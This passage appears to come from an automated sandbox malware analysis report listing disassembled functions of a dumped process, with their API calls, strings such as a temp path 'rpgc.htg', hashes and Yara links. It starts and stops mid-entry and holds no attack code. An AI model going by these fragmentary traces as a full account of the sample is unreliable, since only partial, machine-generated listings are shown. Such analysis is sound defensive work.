                            • RegOpenKeyExW.KERNEL32(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 00AA06F7
                            • RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 00AA071E
                            • RegCloseKey.KERNEL32(?), ref: 00AA0745
                            • RegCloseKey.ADVAPI32(?), ref: 00AA0759
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Close$OpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 1607946009-824357125
                            • Opcode ID: bd6391f8e4a9746ea18e86ef76cf1b8fdb9e95bfa1b0c73d90eeb288ed55109f
                            • Instruction ID: 32f01c9ad4a95df2bb4fd8dfcf60a9cffc4151bfa0ac7af927a7e56c2b9c5ed3
                            • Opcode Fuzzy Hash: bd6391f8e4a9746ea18e86ef76cf1b8fdb9e95bfa1b0c73d90eeb288ed55109f
                            • Instruction Fuzzy Hash: FE115176A40108BF9B14CFA9DC49DEFB7BCEF59300B108659F909C3210EA319911DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA49DA, Relevance: 7.7, APIs: 5, Instructions: 160COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 4048096073-0
                            • Opcode ID: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
                            • Instruction ID: c6e12fce637e33a11a40a4cd85d081aa1b2a69c06f33d881ffbffb79f6b6c1be
                            • Opcode Fuzzy Hash: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
                            • Instruction Fuzzy Hash: A351C331A00305EFDB248FA9C94469EB7B1AFCA360F248269F835A71D0D7B0DE50DB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA14F7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00AA1511
                              • Part of subcall function 00AA34DB: __FF_MSGBANNER.LIBCMT ref: 00AA34F4
                              • Part of subcall function 00AA34DB: __NMSG_WRITE.LIBCMT ref: 00AA34FB
                              • Part of subcall function 00AA34DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00AA6A35,?,00000001,?,?,00AA8179,00000018,00B1D180,0000000C,00AA8209), ref: 00AA3520
                            • std::exception::exception.LIBCMT ref: 00AA1546
                            • std::exception::exception.LIBCMT ref: 00AA1560
                            • __CxxThrowException@8.LIBCMT ref: 00AA1571
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                            • String ID:
                            • API String ID: 615853336-0
                            • Opcode ID: 05f81015708c08b7d1a6f3e9b9cca828a15f8763342e5728c1974268121ae998
                            • Instruction ID: 4760f9e7048b71718c00a4fce346bbf7df34f6015b63d596bb7e1878e44f12ef
                            • Opcode Fuzzy Hash: 05f81015708c08b7d1a6f3e9b9cca828a15f8763342e5728c1974268121ae998
                            • Instruction Fuzzy Hash: 86F0FF3290021ABBCB31EF64DD02AEE3BA9AF86314F5400A9F401931D2DBB18B45CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F490, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                            Download Yara Rule
                            Strings
                            • C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg, xrefs: 00A9F49D
                            • ?T, xrefs: 00A9F522
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memset$ByteCharMultiWide$_sprintf_strlen_wcslen
                            • String ID: C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg$?T
                            • API String ID: 3898977315-1800187480
                            • Opcode ID: a9d705265e4d641eb2f82ff8bdf51046b6208478bda9f1585bfb47871b9e4fb0
                            • Instruction ID: 19507b44a1f1565fe767dae26b67553f0ba30c90f4367f4c0878ccc80414a262
                            • Opcode Fuzzy Hash: a9d705265e4d641eb2f82ff8bdf51046b6208478bda9f1585bfb47871b9e4fb0
                            • Instruction Fuzzy Hash: FD21F9B2A042016FD714EF749D82AAEF6D8AF85310F14893EF559C32C2EB74D9948792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F1D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00AB9558
                            • GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 00AB959F
                              • Part of subcall function 00A9F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00A9F1F5,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00B390E8,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,?,00A9F1F5,?,?,00000001), ref: 00A9F23C
                              • Part of subcall function 00A9F3B0: SHGetMalloc.SHELL32(00A9F1FC), ref: 00A9F3BD
                              • Part of subcall function 00A9F3B0: SHGetDesktopFolder.SHELL32(?,00B390E8), ref: 00A9F3D2
                              • Part of subcall function 00A9F3B0: _wcsncpy.LIBCMT ref: 00A9F3ED
                              • Part of subcall function 00A9F3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00A9F427
                              • Part of subcall function 00A9F3B0: _wcsncpy.LIBCMT ref: 00A9F440
                              • Part of subcall function 00A9F290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00A9F2AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen_memset
                            • String ID: X
                            • API String ID: 2873425188-3081909835
                            • Opcode ID: 8d81a44eba8dbe21148f0bd85642ee695a9fb500af3ca402a42969445c6dbe12
                            • Instruction ID: 9efc87540b1ae4ff28e75dde81c79541b4f2a82d82a77cf50ca367063be7fad6
                            • Opcode Fuzzy Hash: 8d81a44eba8dbe21148f0bd85642ee695a9fb500af3ca402a42969445c6dbe12
                            • Instruction Fuzzy Hash: 1011A0B1B002489BDB11DBD9D8457EEBBF9AF85304F508119E514EB281DBB4084A8BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A91D10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • _memmove.LIBCMT ref: 00A91D57
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1546
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1560
                              • Part of subcall function 00AA14F7: __CxxThrowException@8.LIBCMT ref: 00AA1571
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                            • String ID: @EXITCODE
                            • API String ID: 2734553683-3436989551
                            • Opcode ID: 1a844ac73ab799d9daf97c23806e3f3c9fcb079102dc3b8a7e42763821c4ca4c
                            • Instruction ID: d51a22ff7443e3fb83b8f763aff35c256d5063f9de244675da5904df1b4c3414
                            • Opcode Fuzzy Hash: 1a844ac73ab799d9daf97c23806e3f3c9fcb079102dc3b8a7e42763821c4ca4c
                            • Instruction Fuzzy Hash: D0F01DF2A407426FD754DB78CD42B6776E49B46704F14C92DA08AC77C2FB7AE4428B10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F180, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00AB9524
                              • Part of subcall function 00A935F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00A93681
                              • Part of subcall function 00A935F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A93697
                              • Part of subcall function 00A935F0: __wsplitpath.LIBCMT ref: 00A936C2
                              • Part of subcall function 00A935F0: _wcscpy.LIBCMT ref: 00A936D7
                              • Part of subcall function 00A935F0: _wcscat.LIBCMT ref: 00A936EC
                              • Part of subcall function 00A935F0: SetCurrentDirectoryW.KERNEL32(?), ref: 00A936FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_wcscat_wcscpy
                            • String ID: C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg
                            • API String ID: 2744521063-1666458635
                            • Opcode ID: 63cc58d139a8ebb33089c50481e2765c69ad1cb6018835e5bd07bc0ddfac3f56
                            • Instruction ID: cdb8ac4d1bfbb1ece169c6ff57e24f87e3e063b5d643276c40f0f3641ee8e85b
                            • Opcode Fuzzy Hash: 63cc58d139a8ebb33089c50481e2765c69ad1cb6018835e5bd07bc0ddfac3f56
                            • Instruction Fuzzy Hash: 47916071A00219ABCF14DFA4C9819EF77B9FF49310F148529FA15AB352D735EA05CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A92AB0, Relevance: 3.5, APIs: 2, Instructions: 463COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: std::exception::exception$Exception@8Throw_malloc
                            • String ID:
                            • API String ID: 2388904642-0
                            • Opcode ID: 1e18bd171259040739975cde0cf28159a7933f9e41db7f3f96b0989130aea6dc
                            • Instruction ID: 7d9c8804393e9e20d288fbedf1bb41b966dda00e194ee4efe73f089ba01cfb67
                            • Opcode Fuzzy Hash: 1e18bd171259040739975cde0cf28159a7933f9e41db7f3f96b0989130aea6dc
                            • Instruction Fuzzy Hash: A6F1B275A04209ABCF14EF54C981AFEB3F5FF44300F614466E855AB262D735EE82CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9B1F0, Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 4e06d6e2f994435f03e116b57a503f4287a55f9d151f25d24f45ac3f546027c6
                            • Instruction ID: e547b0b0b7b86b4800566d1513b9bf688154d515bd410a1337cad9e2d57ea686
                            • Opcode Fuzzy Hash: 4e06d6e2f994435f03e116b57a503f4287a55f9d151f25d24f45ac3f546027c6
                            • Instruction Fuzzy Hash: 29916C70A10204DFDF14DF68DA85AAEB7F9AF49300F24C569E8059F256E735EC41CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9D8B0, Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32 ref: 00A9D979
                            • FreeLibrary.KERNEL32(?), ref: 00A9D98E
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeInfoLibraryParametersSystem
                            • String ID:
                            • API String ID: 3403648963-0
                            • Opcode ID: ba72c265b77373fc9509b1474c7abb8f8988704323a28a79bf237cb4a435f647
                            • Instruction ID: 5e1d73f3a937fa3778b6b8ae846a2ee80559e2160d968cf9bb3466a64a545f59
                            • Opcode Fuzzy Hash: ba72c265b77373fc9509b1474c7abb8f8988704323a28a79bf237cb4a435f647
                            • Instruction Fuzzy Hash: 3B218BB1A08301AFC710EF19DD8195ABBE5FB88314F40492DF88897362DB71E946CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93C80, Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _malloc_wcscpy_wcslen
                            • String ID:
                            • API String ID: 245337311-0
                            • Opcode ID: 1fabcad87247a5ef280784cfa2092aecddaf921165ba0e5cecdf27b871339c49
                            • Instruction ID: 692c4cfc7a8e4f8dfec816393c72d3c5a0d5033ce655395544ea3fda94b8ec88
                            • Opcode Fuzzy Hash: 1fabcad87247a5ef280784cfa2092aecddaf921165ba0e5cecdf27b871339c49
                            • Instruction Fuzzy Hash: 501143B1600B40AFD724DB69C442E26B7F4EB4A310F04C82EE89A8BB91D735E845CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA07A0, Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00A9E094,?,00000001,?,00A93653,?), ref: 00AA07CA
                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00A9E094,?,00000001,?,00A93653,?), ref: 00AB6296
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 3c57d0974c84ca68a0c39c9783e26f5e20dbff94beb6c9e61484a14b89773eae
                            • Instruction ID: f586a7335c89ff557bc9fcf90b75096a8385b05b3c112bf64cf3e8802c758dc3
                            • Opcode Fuzzy Hash: 3c57d0974c84ca68a0c39c9783e26f5e20dbff94beb6c9e61484a14b89773eae
                            • Instruction Fuzzy Hash: C8018C30784B00BAF2315B289C5BF912694AB06B20F244715B7E5BF1E2D7F878828A44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A916A0, Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A916E5
                              • Part of subcall function 00A92390: _wcslen.LIBCMT ref: 00A9239D
                              • Part of subcall function 00A92390: _memmove.LIBCMT ref: 00A923C3
                            • _wcscat.LIBCMT ref: 00AB8BC8
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FullNamePath_memmove_wcscat_wcslen
                            • String ID:
                            • API String ID: 189345764-0
                            • Opcode ID: dc2e370f69dd7bcdaa70828fdf271e8b6eea948d85a2b3acbc2806f7a88d96c0
                            • Instruction ID: eab4824b10f2f4c3fdf9f5a3fb459355462c46bf431676d1fcc8d164ce0e1f33
                            • Opcode Fuzzy Hash: dc2e370f69dd7bcdaa70828fdf271e8b6eea948d85a2b3acbc2806f7a88d96c0
                            • Instruction Fuzzy Hash: 8201847574020DA7CF10EBB4DE85ADFB3F8DF15300F1045D5B90597242EE759A858BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA4B96, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __lock_file_memset
                            • String ID:
                            • API String ID: 26237723-0
                            • Opcode ID: 8d1b6afaa8842472f68533dd350de4015a19fd0cc579f2021f6102808a261315
                            • Instruction ID: 2b39a7ede67a0270189f282ded62cd7eaa3868edd869135d65ee3322f7198bf2
                            • Opcode Fuzzy Hash: 8d1b6afaa8842472f68533dd350de4015a19fd0cc579f2021f6102808a261315
                            • Instruction Fuzzy Hash: 1E015E71800219EBCF21AFA4CD0299E7F31AF4A760F008156F8245B0E1D3B28A72DFE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA4966, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AA7E9A: __getptd_noexit.LIBCMT ref: 00AA7E9A
                            • __lock_file.LIBCMT ref: 00AA49AD
                              • Part of subcall function 00AA5391: __lock.LIBCMT ref: 00AA53B6
                            • __fclose_nolock.LIBCMT ref: 00AA49B8
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: d5e0239c53a8fffd89e7567fcd441bfffa1cd230a0fd3d7f5e9c5a7f8d465cab
                            • Instruction ID: 7dc95d01c62b8b556fa8beaf2d89eb7088006595aad7576d4e0fc9494741f01e
                            • Opcode Fuzzy Hash: d5e0239c53a8fffd89e7567fcd441bfffa1cd230a0fd3d7f5e9c5a7f8d465cab
                            • Instruction Fuzzy Hash: E5F0B431900715DADB20ABB4890279F7BA06F4B330F248659F475AB1D2CBBC89129F56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9D5C0, Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                            Download Yara Rule
                            APIs
                            • timeGetTime.WINMM ref: 00A9D5DC
                              • Part of subcall function 00A99430: PeekMessageW.USER32 ref: 00A994B6
                            • Sleep.KERNEL32(00000000), ref: 00ABE125
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: MessagePeekSleepTimetime
                            • String ID:
                            • API String ID: 1792118007-0
                            • Opcode ID: fd1f67e85b26cb530dd02839755b7971166fa67f7f950c90bfdc003144bbc1af
                            • Instruction ID: a54114098f6ec610f41a464d2783ad642ba1321d3537d0e48545248bc4fe2c18
                            • Opcode Fuzzy Hash: fd1f67e85b26cb530dd02839755b7971166fa67f7f950c90bfdc003144bbc1af
                            • Instruction Fuzzy Hash: 26F0B830200602AFC304EB28D949BA6BBE8AB85760F508129E82EC7290DF70A800CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA15A2, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                            Download Yara Rule
                            APIs
                            • ___crtCorExitProcess.LIBCMT ref: 00AA15AA
                              • Part of subcall function 00AA1577: GetModuleHandleW.KERNEL32(mscoree.dll,?,00AA15AF,?,?,00AA350A,000000FF,0000001E,00000001,00000000,00000000,?,00AA6A35,?,00000001,?), ref: 00AA1581
                              • Part of subcall function 00AA1577: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AA1591
                            • ExitProcess.KERNEL32 ref: 00AA15B3
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
